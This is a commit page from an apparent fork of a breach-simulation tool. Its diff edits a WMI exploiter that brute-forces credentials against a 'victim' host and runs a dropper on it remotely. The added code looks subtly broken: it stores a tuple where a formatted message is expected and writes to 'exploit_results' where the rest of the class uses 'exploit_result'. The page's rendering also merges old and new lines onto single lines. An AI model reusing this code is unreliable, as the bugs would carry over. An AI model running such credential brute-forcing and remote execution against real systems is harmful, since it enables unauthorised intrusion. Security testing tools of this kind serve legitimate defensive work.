p59342861
/
monkey
forked from p15670423/monkey
1
0
Fork 0
Code Issues Pull Requests Projects Releases Wiki Activity

Agent: Add WMI error message to results if exploit failed

This commit is contained in:
Mike Salvatore 2022-03-17 12:46:08 -04:00
parent 040a23546c
commit 54bbe8bf2f
1 changed files with 11 additions and 5 deletions
Show Stats Download Patch File Download Diff File Expand all files Collapse all files

16
monkey/infection_monkey/exploit/wmiexec.py
View File

@ -29,10 +29,12 @@ class WmiExploiter(HostExploiter):
def _exploit_host(self) -> ExploiterResultData: def _exploit_host(self) -> ExploiterResultData:
creds = generate_brute_force_combinations(self.options["credentials"]) creds = generate_brute_force_combinations(self.options["credentials"])
intp_creds = interruptable_iter(creds, intp_creds = interruptable_iter(
self.interrupt, creds,
"WMI exploiter has been interrupted by a stop signal from the Island", self.interrupt,
logging.INFO) "WMI exploiter has been interrupted by a stop signal from the Island",
logging.INFO,
)
for user, password, lm_hash, ntlm_hash in intp_creds: for user, password, lm_hash, ntlm_hash in intp_creds:
@ -66,6 +68,8 @@ class WmiExploiter(HostExploiter):
self.report_login_attempt(True, user, password, lm_hash, ntlm_hash) self.report_login_attempt(True, user, password, lm_hash, ntlm_hash)
self.exploit_result.exploitation_success = True self.exploit_result.exploitation_success = True
# TODO: This check is racey at best. Is it really necessary? If we execute an agent on
# the victim and there's one already running, it will stop itself.
# query process list and check if monkey already running on victim # query process list and check if monkey already running on victim
process_list = WmiTools.list_object( process_list = WmiTools.list_object(
wmi_connection, wmi_connection,
@ -126,7 +130,7 @@ class WmiExploiter(HostExploiter):
self.add_vuln_port(port="unknown") self.add_vuln_port(port="unknown")
self.exploit_result.propagation_success = True self.exploit_result.propagation_success = True
else: else:
logger.debug( error_message = (
"Error executing dropper '%s' on remote victim %r (pid=%d, exit_code=%d, " "Error executing dropper '%s' on remote victim %r (pid=%d, exit_code=%d, "
"cmdline=%r)", "cmdline=%r)",
remote_full_path, remote_full_path,
@ -135,6 +139,8 @@ class WmiExploiter(HostExploiter):
result.ReturnValue, result.ReturnValue,
cmdline, cmdline,
) )
logger.debug(error_message)
self.exploit_results.error_message = error_message
result.RemRelease() result.RemRelease()
wmi_connection.close() wmi_connection.close()